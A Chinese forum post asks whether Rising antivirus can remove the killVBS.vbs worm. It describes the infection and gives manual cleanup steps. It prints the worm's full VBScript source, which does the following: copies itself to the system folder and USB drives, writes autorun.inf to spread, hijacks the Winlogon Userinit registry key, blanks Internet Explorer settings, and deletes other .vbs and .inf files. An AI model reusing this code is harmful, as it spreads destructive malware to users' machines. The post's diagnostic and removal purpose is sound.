关于killVBS.vbs病毒,瑞星可以查杀么?~
病毒特征1
根目录下生成autorun.inf 文件
代码如下:
killVBS.vbs
shellexecute=wscript.exe killVBS.vbs
病毒特征2
C:\WINDOWS\SYSTEM 下生成killVBS.vbs vbs脚本通过宿主wscript.exe 运行
串改注册表启动项填加
C:\WINDOWS1\system32\userinit.exe,C:\WINDOWS1\system32\wscript.exe C:\WINDOWS1\system32\killVBS.vbs
killVBS.vbs vbs脚本代码具体如下:
'**********************************************************
'******************** Anti autorun vbscript ***************
'******************** Version 1.01 ***************
'**********************************************************
Option Explicit
On Error Resume Next
Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg
Set Fso = Create
Object("Scripting.FileSystem
Object")
Set Shells = Create
Object("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv=File.Drive
Set InDrive = Fso.drives
Set ReadAll=File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop
Count=Drv.DriveType
Do
If Not Fso.FileExists(SystemDir & "\killVBS.vbs") then
set WriteAll = Fso.CreateTextFile(SystemDir & "\killVBS.vbs",2,true)
WriteAll.Write AllFile
WriteAll.close
set WriteAll = Fso.GetFile(SystemDir & "\killVBS.vbs")
WriteAll.Attributes = -1
End If
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\killVBS.vbs"
For Each Drives In InDrive
If Drives.DriveType=2 Then
LookVBS "inf",Drives.Path & "\"
LookVBS "INF",Drives.Path & "\"
End if
If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
Shells.Regdelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title",""
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page",""
Shells.RegWrite "HKCR\vbsfile\DefaultIcon","%SystemRoot%\System32\WScript.exe,2"
LookVBS "vbs",WinDir & "\"
LookVBS "vbs",Drives.Path & "\"
If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\killVBS.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\killVBS.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\killVBS.vbs")
WriteAll.Attributes = -1
End If
If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "shellexecute=wscript.exe killVBS.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End if
End if
End If
Next
if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1
sub LookVBS(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = Create
Object("Scripting.FileSystem
Object")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "killVBS.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub
病毒表现如下
1串改IE
2防删除自我复制
3感染U盘
手动利用瑞星卡卡杀毒.
1破坏病毒autorun.inf 修改autorun.inf名称如:a.inf后马上建立autorun.inf文件夹进行autorun.inf免疫创建..\文件夹
2利用瑞星卡卡查出wscript.exe 进程结束进程
3找到C:\WINDOWS\SYSTEM\killVBS.vbs 删除
4利用瑞星卡卡系统启动项管理修改
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit 下键值 C:\WINDOWS1\system32\userinit.exe,C:\WINDOWS1\system32\wscript.exe C:\WINDOWS1\system32\killVBS.vbs
删除C:\WINDOWS1\system32\killVBS.vbs
5利用瑞星卡卡恢复IE
这样是不是大功告成了`
呵呵`请各位高手多多指教`我目前只能修复到这里
P@S用瑞星正版能直接查杀,么?~
